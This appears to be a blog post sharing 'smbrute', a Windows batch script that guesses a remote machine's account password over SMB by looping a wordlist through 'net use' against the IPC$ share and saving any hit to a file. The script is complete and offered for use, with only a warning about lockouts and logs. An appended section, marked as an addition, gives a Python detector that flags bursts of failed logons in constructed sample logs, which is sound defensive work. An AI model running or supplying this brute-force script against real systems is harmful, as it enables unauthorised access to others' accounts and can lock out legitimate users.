Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus can do it, but I've had problems with its reliability against SMB shares. Here's a little batch script I wrote that uses the Windows 2000/XP "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Abel, but you can use any list you want. Download my script and Cain's password file from here. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script, as many systems are set up so that they lock accounts after too many failed login attempts.
Usage: smbrute machinename local-account-to-crack
@echo off
rem Don't show the commands we are running, just to make it pretty.
rem Print out how to use the script.
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt (debugging log) and outfile.txt (holds password and machine name)
rem Tell the user to put the word list in the same directory as the script.
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
rem Make sure the user gives input.
if "%1"=="" goto end
if "%2"=="" goto end
rem Delete the old log file.
if exist log.txt del log.txt
rem Loop until the end of the password list file. For each word: print the
rem current password attempt to the screen, use the "NET USE" command to try
rem and start a session (errors go to log.txt), and if it succeeds write the
rem valid password to the output file and stop.
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
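The trail this script leaves, a burst of failed logons from one workstation against one account, is easy to spot with a sliding-window count over the security log. The following is an added detection example, not part of Irongeek's script; the log lines are constructed, their key=value layout is an assumption for illustration, and the five-in-a-minute threshold mirrors a typical account-lockout setting.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records in the shape of Windows failed-logon audit events
# (EventID 4625; Windows 2000/XP logged the same thing as event 529). Hosts,
# users and timestamps are made up for this example.
SAMPLE_LOG = """\
2024-01-10 09:00:01 EventID=4625 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:00:02 EventID=4625 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:00:02 EventID=4625 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:00:03 EventID=4625 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:00:04 EventID=4625 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:00:05 EventID=4624 TargetUserName=administrator WorkstationName=WKS-17
2024-01-10 09:03:10 EventID=4625 TargetUserName=jsmith WorkstationName=WKS-04
2024-01-10 09:09:45 EventID=4625 TargetUserName=jsmith WorkstationName=WKS-04
"""

def parse_event(line):
    """Split 'YYYY-MM-DD HH:MM:SS key=value ...' into (timestamp, fields dict)."""
    stamp, rest = line[:19], line[20:]
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), fields

def find_password_guessing(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {(workstation, account): count} for every source/account pair that
    produced at least `threshold` failed logons inside any `window`-long span.
    With the threshold set to the lockout policy, a wordlist run like smbrute
    is flagged on the same attempt that lockout would stop it."""
    recent = defaultdict(deque)   # (workstation, account) -> timestamps in window
    hits = {}
    for line in log_text.splitlines():
        ts, f = parse_event(line)
        if f.get("EventID") != "4625":
            continue                      # only failed logons count
        key = (f["WorkstationName"], f["TargetUserName"].lower())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:         # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            hits[key] = max(hits.get(key, 0), len(q))
    return hits

if __name__ == "__main__":
    for (host, user), n in find_password_guessing(SAMPLE_LOG).items():
        print(f"{n} failed logons for {user} from {host} within one minute")
```

The two spread-out failures from WKS-04 stay below the threshold, while the five rapid failures from WKS-17 (followed by a success, the sign of a guessed password) are reported.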